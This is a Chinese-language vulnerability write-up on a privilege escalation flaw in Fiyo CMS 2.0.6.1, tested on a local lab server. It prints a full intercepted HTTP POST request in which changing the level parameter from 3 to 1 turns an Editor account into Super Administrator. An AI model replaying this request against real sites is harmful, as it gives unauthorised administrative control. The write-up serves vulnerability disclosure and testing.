Fiyo CMS 2.0.6.1允许低权限用户通过修改级别参数提升到超级管理员权限源码下载:https://sourceforge.net/projects/fiyo-cms环境:PHP5.5+MYSQL5.6+Apache
进入后台,新建几个不同权限的用户
http://192.168.66.128/fiyo_cms_2.0.6.1/dapur/
默认情况下,用户权限与ID对应如下:
Super Administrator = 1
Administrator = 2
Editor = 3
Publisher = 4
Member = 5++
添加用户的链接: http://192.168.66.128/fiyo_cms_2.0.6.1/dapur/?app=user&act=add
CMS默认只有Super Administrator和Administrator权限的用户能够添加新用户
而只有Super Administrator、Administrator、Editor(对应test、test2、test3用户)能够登录进后台,只是Editor(test3)的权限较低,后台UI呈现出的功能菜单少
问题就是出在这个地方:CMS未对添加用户功能(?app=user&act=add)权限限制好,导致Editor(test3)权限的用户也能访问 http://192.168.66.128/fiyo_cms_2.0.6.1/dapur/?app=user
能越权访问还没完,依靠这个越权,能再越权添加(修改)一个用户成超级管理员权限
现在我们再越权修改test3的权限,提升到超级管理员(Super Administrator)
使用BurpSuite拦截请求包
POST /fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 HTTP/1.1
Host: 192.168.66.128
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.66.128/fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3
Cookie: ts_email=test%40qq.com; ts_autologin=2eezkit3mx1c4cc0g0gggo0s88ssgg0; bdshare_firstime=1489735593845; UM_distinctid=15adb2a0fd992-0ae9f1ca30c3da8-33634647-e1000-15adb2a0fda414; CNZZDATA1670348=cnzz_eid%3D403630419-1489730836-http%253A%252F%252F192.168.66.128%252F%26ntime%3D1489730836; PHPSESSID=t24p47qopuqjccg34quffe0g20
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
applyedit=Next&id=3&z=test3&user=test3&z=test3&x=&password=&kpassword=&email=test3%40admin.com&level=3&name=test3&bio=
包中的level=3就是对应用户的权限级别(Editor),那么我们将其修改为level=1(Super Administrator)提交出去
注销后重新登录,test3变成Super Administrator权限了